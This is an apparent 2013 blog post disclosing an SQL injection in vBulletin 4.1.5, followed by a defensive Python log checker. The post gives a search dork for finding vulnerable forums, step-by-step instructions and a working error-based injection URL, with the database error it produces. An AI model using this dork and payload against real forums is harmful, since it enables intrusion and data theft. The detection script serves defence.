Wednesday, 27 March 2013

vbulletin 4.1.5 attachment SQLI


While examining request variables I came across an SQL injection, which later turned out to be present in all vBulletin 4.1.5 installations.

Title: Vulnerability in vBulletin 4.1.5
Dork: Powered by vBulletin 4.1.5
Conditions: An account on the forum, with permission to attach files to messages / themes (attachments).

Register -> go to the forum -> click a topic or, if the board has the option, choose to create an article (the second option more work) -> at the bottom, under Attachments, click 'Manage Attachments' -> in the window that opens, insert the SQL query into the "values[f]" parameter. Example:
Code:
http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1
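After that we get the standard database error page. Both name_const() columns are named after the result of version(), so MySQL rejects the derived table with error 1060 (duplicate column name) and reports that name in the error text. Opening the source code of the page, we see: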

Code:
<!--
Database error in vBulletin 4.1.5:
Invalid SQL:
             SELECT
                 permissionsfrom, Hidden, setpublish, publishdate, userid
             FROM ds23fSDdfsdf_cms_node
             WHERE
                 nodeid = -1599 or (1,2)=(Select * from (Select name_const(version(),1), name_const(version(),1)) a);
MySQL Error    : Duplicate column Name  .1.49-3 '5 '
Error Number   : 1060
Request Date   : Tuesday, February 12th 2013 @ 01:12:33 PM
Error Date     : Tuesday, February 12th 2013 @ 01:12:33

Address        : 127.0.0.1
Username       : Hacker
Classname      : vB_Database
MySQL Version  :
-->
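
A log check for the request shape described above, as an added example that is not part of the original post or of vBulletin: it flags newattachment.php requests in which any values[...] parameter is not a plain integer. It assumes combined-format access logs and that legitimate values are non-negative numeric IDs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (combined log format), for illustration only.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Feb/2013:13:10:02 +0000] "GET /board/newattachment.php'
    '?do=assetmanager&values[f]=12&contenttypeid=18 HTTP/1.1" 200 5120',
    '192.0.2.10 - - [12/Feb/2013:13:12:33 +0000] "GET /board/newattachment.php'
    '?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const('
    'version(),1),name_const(version(),1))a)&contenttypeid=18 HTTP/1.1" 200 2301',
    '192.0.2.44 - - [12/Feb/2013:13:15:40 +0000] "GET /board/newattachment.php'
    '?do=assetmanager&values%5Bf%5D=7&contenttypeid=1 HTTP/1.1" 200 5098',
    '192.0.2.44 - - [12/Feb/2013:13:16:01 +0000] "GET /board/showthread.php'
    '?t=5 HTTP/1.1" 200 18230',
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"\d+")


def request_target(line):
    """Return the request target (path?query) of a log line, or None."""
    match = REQUEST_RE.search(line)
    return match.group(1) if match else None


def suspicious_attachment_requests(lines):
    """Return (line_no, param, decoded_value) for each newattachment.php
    request whose values[...] parameter is not a plain integer."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        target = request_target(line)
        if target is None:
            continue
        url = urlsplit(target)
        if not url.path.lower().endswith("/newattachment.php"):
            continue
        # parse_qsl decodes %5B/%5D and '+', so encoded keys are caught too.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key.startswith("values[") and not INTEGER_RE.fullmatch(value):
                hits.append((line_no, key, value))
    return hits


if __name__ == "__main__":
    for line_no, key, value in suspicious_attachment_requests(SAMPLE_LOG):
        print(f"line {line_no}: non-numeric {key} = {value!r}")
```

The same integer-only rule can be enforced at a reverse proxy or WAF in front of the forum until the board software is updated.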